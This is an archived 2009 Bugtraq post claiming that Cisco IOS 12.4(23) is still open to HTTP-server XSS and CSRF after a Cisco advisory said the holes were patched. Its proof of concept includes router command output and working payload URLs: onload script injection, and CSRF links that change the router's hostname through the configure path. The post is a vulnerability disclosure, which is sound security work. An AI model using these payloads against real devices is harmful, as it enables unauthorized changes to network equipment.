lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20090204215617.31267.qmail@securityfocus.com>
Date: 4 Feb 2009 21:56:17 -0000
From: azask2@...il.com
To: bugtraq@...urityfocus.com
Subject: Cisco IOS XSS/CSRF Vulnerability

There was a Cisco Product Security Incident Response Team (PSIRT)
advisory recently concerning some XSS/CSRF holes in the IOS..

quote{

Document ID: 98605
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml
Revision 1.0
For Public Release 2009 January 14 1600 UTC (GMT)
Cisco Response:
"Two separate Cisco IOSŪ Hypertext Transfer Protocol (HTTP) cross-site
scripting (XSS) vulnerabilities have been reported to Cisco [...]
This response covers two separate cross-site scripting vulnerabilities
within the Cisco IOS Hypertext Transfer Protocol (HTTP) server
(including HTTP secure server - here after referred to as purely HTTP
Server) and applies to all Cisco products that run Cisco IOS Software
versions 11.0 through 12.4 with the HTTP server enabled.

};

According to this advisory these holes were patched in 12.4(15)T8 and
12.4(23).

However i found that the Cisco IOS ( 12.4(23) ) HTTP Server is still
prone to multiple cross-site scripting vulnerabilities because it fails
to sufficiently sanitize user-supplied data.
The attacker may leverage these issues to execute arbitrary script code
in the browser of an unsuspecting user in the context of the affected site.

Proof of concept:


furchtbar#sh ver | i IOS
Cisco IOS Software, C2600 Software (C2600-ADVSECURITYK9-M), Version
12.4(23), RELEASE SOFTWARE (fc1)
furchtbar#show ip http server status | include status
HTTP server status: Enabled
HTTP secure server status: Enabled
furchtbar#sh ip int br | i up
FastEthernet0/0            192.168.1.2     YES NVRAM 
up                    up      

...

[XSS]

http://192.168.1.2/level/15/exec/-/"><body onload=alert("bug")>
http://192.168.1.2/level/15/exec/-/"><iframe onload=alert("bug")>

http://192.168.1.2/exec/"><body onload="alert('bug');">

[CSRF]

http://192.168.1.2/level/15/exec/-/"><body
onload=window.location='http://192.168.1.2/level/15/configure/-/hostname/BUGGY/CR'>

http://192.168.1.2/exec/"><iframe
src="http://192.168.1.2/level/15/configure/-/hostname/BUGGY/CR">



Best Regards,

Zloss

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ